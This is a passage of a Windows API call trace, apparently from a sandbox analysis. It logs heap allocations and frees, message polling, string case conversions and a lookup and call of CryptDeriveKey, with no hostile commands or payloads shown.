hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.773] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.773] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.774] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.774] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.774] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.775] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.775] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.775] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.776] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0199.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa1a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.779] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0199.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.780] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.784] 